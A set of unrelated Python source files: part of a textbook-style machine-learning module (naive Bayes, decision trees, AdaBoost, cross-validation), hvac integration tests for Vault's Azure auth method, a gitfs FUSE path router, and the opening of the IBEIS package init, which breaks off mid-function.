return [list(map(num_or_str, line.split(delim))) for line in lines]
#______________________________________________________________________________
class CountingProbDist:
"""A probability distribution formed by observing and counting examples.
If p is an instance of this class and o is an observed value, then
there are 3 main operations:
p.add(o) increments the count for observation o by 1.
p.sample() returns a random element from the distribution.
p[o] returns the probability for o (as in a regular ProbDist)."""
def __init__(self, observations=[], default=0):
"""Create a distribution, and optionally add in some observations.
By default this is an unsmoothed distribution, but saying default=1,
for example, gives you add-one smoothing."""
update(self, dictionary={}, n_obs=0.0, default=default, sampler=None)
for o in observations:
self.add(o)
def add(self, o):
"Add an observation o to the distribution."
self.smooth_for(o)
self.dictionary[o] += 1
self.n_obs += 1
self.sampler = None
def smooth_for(self, o):
"""Include o among the possible observations, whether or not
it's been observed yet."""
if o not in self.dictionary:
self.dictionary[o] = self.default
self.n_obs += self.default
self.sampler = None
def __getitem__(self, item):
"Return an estimate of the probability of item."
self.smooth_for(item)
return self.dictionary[item] / self.n_obs
# (top() and sample() are not used in this module, but elsewhere.)
def top(self, n):
"Return (count, obs) tuples for the n most frequent observations."
return heapq.nlargest(n, [(v, k) for (k, v) in list(self.dictionary.items())])
def sample(self):
"Return a random sample from the distribution."
if self.sampler is None:
self.sampler = weighted_sampler(list(self.dictionary.keys()),
list(self.dictionary.values()))
return self.sampler()
#______________________________________________________________________________
def PluralityLearner(dataset):
"""A very dumb algorithm: always pick the result that was most popular
in the training data. Makes a baseline for comparison."""
most_popular = mode([e[dataset.target] for e in dataset.examples])
def predict(example):
"Always return same result: the most popular from the training set."
return most_popular
return predict
#______________________________________________________________________________
def NaiveBayesLearner(dataset):
"""Just count how many times each value of each input attribute
occurs, conditional on the target value. Count the different
target values too."""
targetvals = dataset.values[dataset.target]
target_dist = CountingProbDist(targetvals)
attr_dists = dict(((gv, attr), CountingProbDist(dataset.values[attr]))
for gv in targetvals
for attr in dataset.inputs)
for example in dataset.examples:
targetval = example[dataset.target]
target_dist.add(targetval)
for attr in dataset.inputs:
attr_dists[targetval, attr].add(example[attr])
def predict(example):
"""Predict the target value for example. Consider each possible value,
and pick the most likely by looking at each attribute independently."""
def class_probability(targetval):
return (target_dist[targetval]
* product(attr_dists[targetval, attr][example[attr]]
for attr in dataset.inputs))
return argmax(targetvals, class_probability)
return predict
#______________________________________________________________________________
def NearestNeighborLearner(dataset, k=1):
"k-NearestNeighbor: the k nearest neighbors vote."
def predict(example):
"Find the k closest, and have them vote for the best."
best = heapq.nsmallest(k, ((dataset.distance(e, example), e)
for e in dataset.examples))
return mode(e[dataset.target] for (d, e) in best)
return predict
#______________________________________________________________________________
class DecisionFork:
"""A fork of a decision tree holds an attribute to test, and a dict
of branches, one for each of the attribute's values."""
def __init__(self, attr, attrname=None, branches=None):
"Initialize by saying what attribute this node tests."
update(self, attr=attr, attrname=attrname or attr,
branches=branches or {})
def __call__(self, example):
"Given an example, classify it using the attribute and the branches."
attrvalue = example[self.attr]
return self.branches[attrvalue](example)
def add(self, val, subtree):
"Add a branch. If self.attr = val, go to the given subtree."
self.branches[val] = subtree
def display(self, indent=0):
name = self.attrname
print('Test', name)
for (val, subtree) in list(self.branches.items()):
print(' '*4*indent, name, '=', val, '==>', end=' ')
subtree.display(indent+1)
def __repr__(self):
return ('DecisionFork(%r, %r, %r)'
% (self.attr, self.attrname, self.branches))
class DecisionLeaf:
"A leaf of a decision tree holds just a result."
def __init__(self, result):
self.result = result
def __call__(self, example):
return self.result
def display(self, indent=0):
print('RESULT =', self.result)
def __repr__(self):
return repr(self.result)
#______________________________________________________________________________
def DecisionTreeLearner(dataset):
"[Fig. 18.5]"
target, values = dataset.target, dataset.values
def decision_tree_learning(examples, attrs, parent_examples=()):
if len(examples) == 0:
return plurality_value(parent_examples)
elif all_same_class(examples):
return DecisionLeaf(examples[0][target])
elif len(attrs) == 0:
return plurality_value(examples)
else:
A = choose_attribute(attrs, examples)
tree = DecisionFork(A, dataset.attrnames[A])
for (v_k, exs) in split_by(A, examples):
subtree = decision_tree_learning(
exs, removeall(A, attrs), examples)
tree.add(v_k, subtree)
return tree
def plurality_value(examples):
"""Return the most popular target value for this set of examples.
(If target is binary, this is the majority; otherwise plurality.)"""
popular = argmax_random_tie(values[target],
lambda v: count(target, v, examples))
return DecisionLeaf(popular)
def count(attr, val, examples):
return count_if(lambda e: e[attr] == val, examples)
def all_same_class(examples):
"Are all these examples in the same target class?"
class0 = examples[0][target]
return all(e[target] == class0 for e in examples)
def choose_attribute(attrs, examples):
"Choose the attribute with the highest information gain."
return argmax_random_tie(attrs,
lambda a: information_gain(a, examples))
def information_gain(attr, examples):
"Return the expected reduction in entropy from splitting by attr."
def I(examples):
return information_content([count(target, v, examples)
for v in values[target]])
N = float(len(examples))
remainder = sum((len(examples_i) / N) * I(examples_i)
for (v, examples_i) in split_by(attr, examples))
return I(examples) - remainder
def split_by(attr, examples):
"Return a list of (val, examples) pairs for each val of attr."
return [(v, [e for e in examples if e[attr] == v])
for v in values[attr]]
return decision_tree_learning(dataset.examples, dataset.inputs)
def information_content(values):
"Number of bits to represent the probability distribution in values."
probabilities = normalize(removeall(0, values))
return sum(-p * log2(p) for p in probabilities)
#______________________________________________________________________________
# A decision list is implemented as a list of (test, value) pairs.
def DecisionListLearner(dataset):
"""[Fig. 18.11]"""
def decision_list_learning(examples):
if not examples:
return [(True, False)]
t, o, examples_t = find_examples(examples)
if not t:
raise Failure
return [(t, o)] + decision_list_learning(examples - examples_t)
def find_examples(examples):
"""Find a set of examples that all have the same outcome under
some test. Return a tuple of the test, outcome, and examples."""
unimplemented()
def passes(example, test):
"Does the example pass the test?"
unimplemented()
def predict(example):
"Predict the outcome for the first passing test."
for test, outcome in predict.decision_list:
if passes(example, test):
return outcome
predict.decision_list = decision_list_learning(set(dataset.examples))
return predict
#______________________________________________________________________________
def NeuralNetLearner(dataset, sizes):
"""Layered feed-forward network."""
activations = [[0.0 for i in range(n)] for n in sizes]
weights = []
def predict(example):
unimplemented()
return predict
class NNUnit:
"""Unit of a neural net."""
def __init__(self):
unimplemented()
def PerceptronLearner(dataset, sizes):
def predict(example):
return sum([])
unimplemented()
#______________________________________________________________________________
def Linearlearner(dataset):
"""Fit a linear model to the data."""
unimplemented()
#______________________________________________________________________________
def EnsembleLearner(learners):
"""Given a list of learning algorithms, have them vote."""
def train(dataset):
predictors = [learner(dataset) for learner in learners]
def predict(example):
return mode(predictor(example) for predictor in predictors)
return predict
return train
#______________________________________________________________________________
def AdaBoost(L, K):
"""[Fig. 18.34]"""
def train(dataset):
examples, target = dataset.examples, dataset.target
N = len(examples)
epsilon = 1./(2*N)
w = [1./N] * N
h, z = [], []
for k in range(K):
h_k = L(dataset, w)
h.append(h_k)
error = sum(weight for example, weight in zip(examples, w)
if example[target] != h_k(example))
# Avoid divide-by-0 from either 0% or 100% error rates:
error = clip(error, epsilon, 1-epsilon)
for j, example in enumerate(examples):
if example[target] == h_k(example):
w[j] *= error / (1. - error)
w = normalize(w)
z.append(math.log((1. - error) / error))
return WeightedMajority(h, z)
return train
def WeightedMajority(predictors, weights):
"Return a predictor that takes a weighted vote."
def predict(example):
return weighted_mode((predictor(example) for predictor in predictors),
weights)
return predict
def weighted_mode(values, weights):
"""Return the value with the greatest total weight.
>>> weighted_mode('abbaa', [1,2,3,1,2])
'b'"""
totals = defaultdict(int)
for v, w in zip(values, weights):
totals[v] += w
return max(list(totals.keys()), key=totals.get)
#_____________________________________________________________________________
# Adapting an unweighted learner for AdaBoost
def WeightedLearner(unweighted_learner):
"""Given a learner that takes just an unweighted dataset, return
one that takes also a weight for each example. [p. 749 footnote 14]"""
def train(dataset, weights):
return unweighted_learner(replicated_dataset(dataset, weights))
return train
def replicated_dataset(dataset, weights, n=None):
"Copy dataset, replicating each example in proportion to its weight."
n = n or len(dataset.examples)
result = copy.copy(dataset)
result.examples = weighted_replicate(dataset.examples, weights, n)
return result
def weighted_replicate(seq, weights, n):
"""Return n selections from seq, with the count of each element of
seq proportional to the corresponding weight (filling in fractions
randomly).
>>> weighted_replicate('ABC', [1,2,1], 4)
['A', 'B', 'B', 'C']"""
assert len(seq) == len(weights)
weights = normalize(weights)
wholes = [int(w*n) for w in weights]
fractions = [(w*n) % 1 for w in weights]
return (flatten([x] * nx for x, nx in zip(seq, wholes))
+ weighted_sample_with_replacement(seq, fractions, n - sum(wholes)))
def flatten(seqs): return sum(seqs, [])
#_____________________________________________________________________________
# Functions for testing learners on examples
def test(predict, dataset, examples=None, verbose=0):
"Return the proportion of the examples that are correctly predicted."
if examples is None:
examples = dataset.examples
if len(examples) == 0:
return 0.0
right = 0.0
for example in examples:
desired = example[dataset.target]
output = predict(dataset.sanitize(example))
if output == desired:
right += 1
if verbose >= 2:
print(' OK: got %s for %s' % (desired, example))
elif verbose:
print('WRONG: got %s, expected %s for %s' % (
output, desired, example))
return right / len(examples)
def train_and_test(learner, dataset, start, end):
"""Reserve dataset.examples[start:end] for test; train on the remainder.
Return the proportion of examples correct on the test examples."""
examples = dataset.examples
try:
dataset.examples = examples[:start] + examples[end:]
return test(learner(dataset), dataset, examples[start:end])
finally:
dataset.examples = examples
def cross_validation(learner, dataset, k=10, trials=1):
"""Do k-fold cross_validate and return their mean.
That is, keep out 1/k of the examples for testing on each of k runs.
Shuffle the examples first; If trials>1, average over several shuffles."""
if k is None:
k = len(dataset.examples)
if trials > 1:
return mean([cross_validation(learner, dataset, k, trials=1)
for t in range(trials)])
else:
n = len(dataset.examples)
random.shuffle(dataset.examples)
return mean([train_and_test(learner, dataset, i*(n/k), (i+1)*(n/k))
for i in range(k)])
def leave1out(learner, dataset):
"Leave one out cross-validation over the dataset."
return cross_validation(learner, dataset, k=len(dataset.examples))
def learningcurve(learner, dataset, trials=10, sizes=None):
if sizes is None:
sizes = list(range(2, len(dataset.examples)-10, 2))
def score(learner, size):
random.shuffle(dataset.examples)
return train_and_test(learner, dataset, 0, size)
return [(size, mean([score(learner, size) for t in range(trials)]))
for size in sizes]
#______________________________________________________________________________
# The rest of this file gives datasets for machine learning problems.
orings = DataSet(name='orings', target='Distressed',
attrnames="Rings Distressed Temp Pressure Flightnum")
zoo = DataSet(name='zoo', target='type', exclude=['name'],
attrnames="name hair feathers eggs milk airborne aquatic " +
"predator toothed backbone breathes venomous fins legs tail " +
"domestic catsize type")
iris = DataSet(name="iris", target="class",
attrnames="sepal-len sepal-width petal-len petal-width class")
#______________________________________________________________________________
# The Restaurant example from Fig. 18.2
def RestaurantDataSet(examples=None):
"Build a DataSet of Restaurant waiting examples. [Fig. 18.3]"
return DataSet(name='restaurant', target='Wait', examples=examples,
attrnames='Alternate Bar Fri/Sat Hungry Patrons Price '
+ 'Raining Reservation Type WaitEstimate Wait')
restaurant = RestaurantDataSet()
def T(attrname, branches):
branches = dict((value, (child if isinstance(child, DecisionFork)
else DecisionLeaf(child)))
for value, child in list(branches.items()))
return DecisionFork(restaurant.attrnum(attrname), attrname, branches)
Fig[18, 2] = T('Patrons',
{'None': 'No', 'Some': 'Yes', 'Full':
T('WaitEstimate',
{'>60': 'No', '0-10': 'Yes',
'30-60':
T('Alternate', {'No':
T('Reservation', {'Yes': 'Yes', 'No':
T('Bar', {'No': 'No',
'Yes': 'Yes'})}),
'Yes':
T('Fri/Sat', {'No': 'No', 'Yes': 'Yes'})}),
'10-30':
T('Hungry', {'No': 'Yes', 'Yes':
T('Alternate',
{'No': 'Yes', 'Yes':
T('Raining', {'No': 'No', 'Yes': 'Yes'})})})})})
__doc__ += """
[Fig. 18.6]
>>> random.seed(437)
>>> restaurant_tree = DecisionTreeLearner(restaurant)
>>> restaurant_tree.display()
Test Patrons
Patrons = None ==> RESULT = No
Patrons = Full ==> Test Hungry
Hungry = Yes ==> Test Type
Type = Burger ==> RESULT = Yes
Type = Thai ==> Test Fri/Sat
Fri/Sat = Yes ==> RESULT = Yes
Fri/Sat = No ==> RESULT = No
Type = French ==> RESULT = Yes
Type = Italian ==> RESULT = No
Hungry = No ==> RESULT = No
Patrons = Some ==> RESULT = Yes
"""
def SyntheticRestaurant(n=20):
"Generate a DataSet with n examples."
def gen():
example = list(map(random.choice, restaurant.values))
example[restaurant.target] = Fig[18, 2](example)
return example
return RestaurantDataSet([gen() for i in range(n)])
#______________________________________________________________________________
# Artificial, generated datasets.
def Majority(k, n):
"""Return a DataSet with n k-bit examples of the majority problem:
k random bits followed by a 1 if more than half the bits are 1, else 0."""
examples = []
for i in range(n):
bits = [random.choice([0, 1]) for i in range(k)]
bits.append(int(sum(bits) > k/2))
examples.append(bits)
return DataSet(name="majority", examples=examples)
def Parity(k, n, name="parity"):
"""Return a DataSet with n k-bit examples of the parity problem:
k random bits followed by a 1 if an odd number of bits are 1, else 0."""
examples = []
for i in range(n):
bits = [random.choice([0, 1]) for i in range(k)]
bits.append(sum(bits) % 2)
examples.append(bits)
return DataSet(name=name, examples=examples)
def Xor(n):
"""Return a DataSet with n examples of 2-input xor."""
return Parity(2, n, name="xor")
def ContinuousXor(n):
"2 inputs are chosen uniformly from (0.0 .. 2.0]; output is xor of ints."
examples = []
for i in range(n):
x, y = [random.uniform(0.0, 2.0) for i in '12']
examples.append([x, y, int(x) != int(y)])
return DataSet(name="continuous xor", examples=examples)
#______________________________________________________________________________
def compare(algorithms=[PluralityLearner, NaiveBayesLearner,
NearestNeighborLearner, DecisionTreeLearner],
datasets=[iris, orings, zoo, restaurant, SyntheticRestaurant(20),
Majority(7, 100), Parity(7, 100), Xor(100)],
k=10, trials=1):
"""Compare various learners on various datasets using cross-validation.
Print results as a table."""
print_table([[a.__name__.replace('Learner', '')] +
[cross_validation(a, d, k, trials) for d in datasets]
for a in algorithms],
header=[''] + [d.name[0:7] for d in datasets], numfmt='%.2f')
|
|
import logging
from unittest import TestCase
from unittest import skipIf
from parameterized import parameterized, param
from hvac import exceptions
from tests import utils
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
@skipIf(
utils.vault_version_lt("0.10.0"),
"Azure auth method not available before Vault version 0.10.0",
)
class TestAzure(HvacIntegrationTestCase, TestCase):
TEST_MOUNT_POINT = "azure-test"
def setUp(self):
super(TestAzure, self).setUp()
if "%s/" % self.TEST_MOUNT_POINT not in self.client.sys.list_auth_methods():
self.client.sys.enable_auth_method(
method_type="azure",
path=self.TEST_MOUNT_POINT,
)
def tearDown(self):
super(TestAzure, self).tearDown()
self.client.sys.disable_auth_method(
path=self.TEST_MOUNT_POINT,
)
@parameterized.expand(
[
param(
"tenant_id and resource",
),
param(
"client id and secret",
client_id="my-client-id",
client_secret="my-client-secert",
),
param(
"invalid environment",
environment="AzurePublicCats",
raises=exceptions.ParamValidationError,
exception_message="invalid environment argument provided",
),
]
)
def test_configure(
self,
label,
client_id=None,
client_secret=None,
environment="AzurePublicCloud",
raises=None,
exception_message="",
):
tenant_id = "my-tenant-id"
resource = "my-resource"
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.azure.configure(
tenant_id=tenant_id,
resource=resource,
client_id=client_id,
client_secret=client_secret,
environment=environment,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
configure_response = self.client.auth.azure.configure(
tenant_id=tenant_id,
resource=resource,
client_id=client_id,
client_secret=client_secret,
environment=environment,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("configure_response: %s" % configure_response)
self.assertEqual(
first=bool(configure_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
),
param(
"no config written yet",
write_config_first=False,
raises=exceptions.InvalidPath,
),
]
)
def test_read_config(self, label, write_config_first=True, raises=None):
expected_config = {
"tenant_id": "my-tenant-id",
"resource": "my-resource",
}
if write_config_first:
self.client.auth.azure.configure(
mount_point=self.TEST_MOUNT_POINT, **expected_config
)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.read_config(
mount_point=self.TEST_MOUNT_POINT,
)
else:
read_config_response = self.client.auth.azure.read_config(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_config_response: %s" % read_config_response)
for k, v in expected_config.items():
self.assertEqual(
first=v,
second=read_config_response[k],
)
@parameterized.expand(
[
("success",),
]
)
def test_delete_config(self, label):
delete_config_response = self.client.auth.azure.delete_config(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("delete_config_response: %s" % delete_config_response)
self.assertEqual(
first=bool(delete_config_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
bound_service_principal_ids=["my-sp-id"],
),
param(
"CSV policies arg",
bound_service_principal_ids=["my-sp-id"],
policies="cats,dogs",
),
param(
"list policies arg",
bound_service_principal_ids=["my-sp-id"],
policies=["cats", "dogs"],
),
param(
"no bound constraints",
raises=exceptions.InvalidRequest,
exception_message="must have at least one bound constraint when creating/updating a role",
),
param(
"wrong policy arg type",
bound_service_principal_ids=["my-sp-id"],
policies={"dict": "bad"},
raises=exceptions.ParamValidationError,
exception_message="unsupported policies argument provided",
),
param(
"mixed policy arg type",
bound_service_principal_ids=["my-sp-id"],
policies=["cats", "dogs", None, 42],
raises=exceptions.ParamValidationError,
exception_message="unsupported policies argument provided",
),
]
)
def test_create_role(
self,
label,
policies=None,
bound_service_principal_ids=None,
raises=None,
exception_message="",
):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.azure.create_role(
name="my-role",
policies=policies,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
create_role_response = self.client.auth.azure.create_role(
name="my-role",
policies=policies,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
self.assertEqual(
first=bool(create_role_response),
second=True,
)
@parameterized.expand(
[
param(
"success",
),
param(
"nonexistent role name",
configure_role_first=False,
raises=exceptions.InvalidPath,
),
]
)
def test_read_role(
self,
label,
role_name="hvac",
configure_role_first=True,
raises=None,
exception_message="",
):
bound_service_principal_ids = ["some-dummy-sp-id"]
if configure_role_first:
create_role_response = self.client.auth.azure.create_role(
name=role_name,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.read_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
else:
read_role_response = self.client.auth.azure.read_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_role_response: %s" % read_role_response)
self.assertEqual(
first=read_role_response["bound_service_principal_ids"],
second=bound_service_principal_ids,
)
@parameterized.expand(
[
param(
"success",
),
param(
"no roles",
num_roles_to_create=0,
raises=exceptions.InvalidPath,
),
param(
"no config",
write_config_first=False,
),
]
)
def test_list_roles(
self, label, num_roles_to_create=1, write_config_first=True, raises=None
):
if write_config_first:
self.client.auth.azure.configure(
tenant_id="my-tenant-id",
resource="my-resource",
mount_point=self.TEST_MOUNT_POINT,
)
roles_to_create = ["hvac%s" % n for n in range(0, num_roles_to_create)]
bound_service_principal_ids = ["some-dummy-sp-id"]
logging.debug("roles_to_create: %s" % roles_to_create)
for role_to_create in roles_to_create:
create_role_response = self.client.auth.azure.create_role(
name=role_to_create,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.list_roles(
mount_point=self.TEST_MOUNT_POINT,
)
else:
list_roles_response = self.client.auth.azure.list_roles(
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("read_role_response: %s" % list_roles_response)
self.assertEqual(
first=list_roles_response["keys"],
second=roles_to_create,
)
@parameterized.expand(
[
param(
"success",
),
param(
"nonexistent role name",
configure_role_first=False,
),
]
)
def test_delete_role(self, label, configure_role_first=True, raises=None):
role_name = "hvac"
bound_service_principal_ids = ["some-dummy-sp-id"]
if configure_role_first:
create_role_response = self.client.auth.azure.create_role(
name=role_name,
bound_service_principal_ids=bound_service_principal_ids,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("create_role_response: %s" % create_role_response)
if raises is not None:
with self.assertRaises(raises):
self.client.auth.azure.delete_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
else:
delete_role_response = self.client.auth.azure.delete_role(
name=role_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug("delete_role_response: %s" % delete_role_response)
self.assertEqual(
first=bool(delete_role_response),
second=True,
)
|
|
# Copyright 2014-2016 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import time
import shutil
import inspect
from pwd import getpwnam
from grp import getgrnam
from errno import ENOSYS
from fuse import FUSE, FuseOSError
from gitfs.repository import Repository
from gitfs.cache import CachedIgnore, lru_cache
from gitfs.events import shutting_down, fetch, idle
from gitfs.log import log
class Router(object):
def __init__(
self,
remote_url,
repo_path,
mount_path,
credentials,
current_path="current",
history_path="history",
branch=None,
user="root",
group="root",
**kwargs
):
"""
Clone repo from a remote into repo_path/<repo_name> and checkout to
a specific branch.
:param str remote_url: URL of the repository to clone
:param str repo_path: Where are all the repos are cloned
:param str branch: Branch to checkout after the
clone. The default is to use the remote's default branch.
"""
self.remote_url = remote_url
self.repo_path = repo_path
self.mount_path = mount_path
self.current_path = current_path
self.history_path = history_path
self.branch = branch
self.routes = []
log.info("Cloning into {}".format(self.repo_path))
self.repo = Repository.clone(
self.remote_url, self.repo_path, self.branch, credentials
)
log.info("Done cloning")
self.repo.credentials = credentials
submodules = os.path.join(self.repo_path, ".gitmodules")
ignore = os.path.join(self.repo_path, ".gitignore")
self.repo.ignore = CachedIgnore(
submodules=submodules,
ignore=ignore,
exclude=kwargs["ignore_file"] or None,
hard_ignore=kwargs["hard_ignore"],
)
self.uid = getpwnam(user).pw_uid
self.gid = getgrnam(group).gr_gid
self.commit_queue = kwargs["commit_queue"]
self.mount_time = int(time.time())
self.max_size = kwargs["max_size"]
self.max_offset = kwargs["max_offset"]
self.repo.commits.update()
self.workers = []
def init(self, path):
for worker in self.workers:
worker.start()
log.debug("Done init")
def destroy(self, path):
log.debug("Stopping workers")
shutting_down.set()
fetch.set()
for worker in self.workers:
worker.join()
log.debug("Workers stopped")
shutil.rmtree(self.repo_path)
log.info("Successfully umounted %s", self.mount_path)
def __call__(self, operation, *args):
"""
Magic method which calls a specific method from a view.
In Fuse API, almost each method receives a path argument. Based on that
path we can route each call to a specific view. For example, if a
method which has a path argument like `/current/dir1/dir2/file1` is
called, we need to get the certain view that will know how to handle
this path, instantiate it and then call our method on the newly created
object.
:param str operation: Method name to be called
:param args: tuple containing the arguments to be transmitted to
the method
:rtype: function
"""
if operation in ["destroy", "init"]:
view = self
else:
path = args[0]
view, relative_path = self.get_view(path)
args = (relative_path,) + args[1:]
log.debug("Call %s %s with %r" % (operation, view.__class__.__name__, args))
if not hasattr(view, operation):
log.debug("No attribute %s on %s" % (operation, view.__class__.__name__))
raise FuseOSError(ENOSYS)
idle.clear()
return getattr(view, operation)(*args)
def register(self, routes):
for regex, view in routes:
log.debug("Registering %s for %s", view, regex)
self.routes.append({"regex": regex, "view": view})
def get_view(self, path):
"""
Try to map a given path to it's specific view.
If a match is found, a view object is created with the right regex
groups(named or unnamed).
:param str path: path to be matched
:rtype: view object, relative path
"""
for route in self.routes:
result = re.search(route["regex"], path)
if result is None:
continue
groups = result.groups()
relative_path = re.sub(route["regex"], "", path)
relative_path = "/" if not relative_path else relative_path
cache_key = result.group(0)
log.debug("Router: Cache key for %s: %s", path, cache_key)
view = lru_cache.get_if_exists(cache_key)
if view is not None:
log.debug("Router: Serving %s from cache", path)
return view, relative_path
kwargs = result.groupdict()
# TODO: move all this to a nice config variable
kwargs["repo"] = self.repo
kwargs["ignore"] = self.repo.ignore
kwargs["repo_path"] = self.repo_path
kwargs["mount_path"] = self.mount_path
kwargs["regex"] = route["regex"]
kwargs["relative_path"] = relative_path
kwargs["current_path"] = self.current_path
kwargs["history_path"] = self.history_path
kwargs["uid"] = self.uid
kwargs["gid"] = self.gid
kwargs["branch"] = self.branch
kwargs["mount_time"] = self.mount_time
kwargs["queue"] = self.commit_queue
kwargs["max_size"] = self.max_size
kwargs["max_offset"] = self.max_offset
args = set(groups) - set(kwargs.values())
view = route["view"](*args, **kwargs)
lru_cache[cache_key] = view
log.debug("Router: Added %s to cache", path)
return view, relative_path
raise ValueError("Found no view for '{}'".format(path))
def __getattr__(self, attr_name):
"""
It will only be called by the `__init__` method from `fuse.FUSE` to
establish which operations will be allowed after mounting the
filesystem.
"""
methods = inspect.getmembers(FUSE, predicate=callable)
fuse_allowed_methods = set(elem[0] for elem in methods)
return attr_name in fuse_allowed_methods - set(["bmap", "lock"])
|
|
# -*- coding: utf-8 -*-
"""
IBEIS: main package init
TODO: LAZY IMPORTS?
http://code.activestate.com/recipes/473888-lazy-module-imports/
"""
# flake8: noqa
from __future__ import absolute_import, division, print_function, unicode_literals
try:
import utool as ut
import dtool
except ImportError as ex:
print('[ibeis !!!] ERROR: Unable to load all core utility modules.')
print('[ibeis !!!] Perhaps try super_setup.py pull')
raise
ut.noinject(__name__, '[ibeis.__init__]')
if ut.VERBOSE:
print('[ibeis] importing ibeis __init__')
if ut.is_developer():
standard_visualization_functions = [
'show_image',
'show_chip',
'show_chipmatch',
'show_chipmatches',
'show_vocabulary',
#'show_vocabulary',
]
# If we dont initialize plottool before <something>
# then it causes a crash in windows. Its so freaking weird.
# something is not guitool, ibeis.viz
# has to be before control, can be after constants, params, and main_module
#import plottool
try:
from ibeis import constants
from ibeis import constants as const
from ibeis import params
from ibeis import main_module
from ibeis import other
from ibeis.init import sysres
#main_module._preload()
from ibeis import control
from ibeis import dbio
#from ibeis import web
from ibeis.init import sysres
from ibeis.main_module import (main, _preload, _init_numpy, main_loop,
test_main, opendb, opendb_in_background, opendb_bg_web)
from ibeis.control.IBEISControl import IBEISController
from ibeis.algo.hots.query_request import QueryRequest
from ibeis.algo.hots.chip_match import ChipMatch, AnnotMatch
from ibeis.init.sysres import (get_workdir, set_workdir, ensure_pz_mtest,
ensure_nauts, ensure_wilddogs, list_dbs)
from ibeis.init import main_helpers
from ibeis import algo
from ibeis import expt
from ibeis import templates
from ibeis.templates import generate_notebook
from ibeis.control.controller_inject import register_preprocs
from ibeis import core_annots
from ibeis import core_images
except Exception as ex:
ut.printex(ex, 'Error when importing ibeis', tb=True)
raise
def import_subs():
# Weird / Fancy loading.
# I want to make this simpler
from ibeis import algo
from ibeis import viz
from ibeis import web
from ibeis import gui
from ibeis import templates
def run_experiment(e='print', db='PZ_MTEST', a=['unctrl'], t=['default'],
initial_aids=None, qaid_override=None, daid_override=None,
lazy=False, **kwargs):
"""
Convience function
CommandLine:
ibeis -e print
Args:
e (str): (default = 'print')
db (str): (default = 'PZ_MTEST')
a (list): (default = ['unctrl'])
t (list): (default = ['default'])
qaid_override (None): (default = None)
lazy (bool): (default = False)
Returns:
function: func - live python function
CommandLine:
python -m ibeis.__init__ --exec-run_experiment --show
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis import * # NOQA
>>> e = 'rank_cdf'
>>> db = 'testdb1'
>>> a = ['default:species=primary']
>>> t = ['default']
>>> initial_aids = [2, 3, 4, 7, 9, 10, 11]
>>> qaid_override = [1, 9, 10, 11, 2, 3]
>>> testres = run_experiment(e, db, a, t, qaid_override=qaid_override,
>>> initial_aids=initial_aids)
>>> result = ('testres = %s' % (str(testres),))
>>> print(result)
>>> ut.quit_if_noshow()
>>> testres.draw_func()
>>> ut.show_if_requested()
"""
import functools
def find_expt_func(e):
import utool as ut
import ibeis.dev
for tup in ibeis.dev.REGISTERED_DOCTEST_EXPERIMENTS:
modname, funcname = tup[:2]
aliases = tup[2] if len(tup) == 3 else []
if e == funcname or e in aliases:
module = ut.import_modname(modname)
func = module.__dict__[funcname]
return func
# hack in --tf magic
func = ut.find_testfunc('ibeis', funcname)[0]
return func
def build_commandline(e=e, **kwargs):
# Equivalent command line version of this func
import ibeis.dev
valid_e_flags = ut.flatten([[tup[1]] if len(tup) == 2 else [tup[1]] + tup[2] for tup in ibeis.dev.REGISTERED_DOCTEST_EXPERIMENTS])
if e in valid_e_flags:
epref = '-e'
else:
# hack to use tf
epref = '--tf'
command_parts = ['ibeis',
epref, e,
'--db', db,
'-a', ' '.join(a).replace('(', '\(').replace(')', '\)'),
'-t', ' '.join(t),
]
if qaid_override is not None:
command_parts.extend(['--qaid=' + ','.join(map(str, qaid_override))])
if daid_override is not None:
command_parts.extend(['--daid-override=' + ','.join(map(str, daid_override))])
if 'disttype' in kwargs:
command_parts.extend(['--disttype=', ','.join(map(str, kwargs['disttype']))])
# hack parse out important args that were on command line
if 'f' in kwargs:
command_parts.extend(['-f', ' '.join(kwargs['f'])])
if 'test_cfgx_slice' in kwargs:
# very hacky, much more than checking for f
slice_ = kwargs['test_cfgx_slice']
slice_attrs = [getattr(slice_, attr, '')
for attr in ['start', 'stop', 'step']]
slice_attrs = ut.replace_nones(slice_attrs, '')
slicestr = ':'.join(map(str, slice_attrs))
command_parts.extend(['--test_cfgx_slice', slicestr])
command_parts.extend(['--show'])
command_line_str = ' '.join(command_parts)
# Warning, not always equivalent
print('Equivalent Command Line:')
print(command_line_str)
return command_line_str
command_line_str = build_commandline(**kwargs)
def draw_cases(testres, **kwargs):
e_ = 'draw_cases'
func = find_expt_func(e_)
ibs = testres.ibs
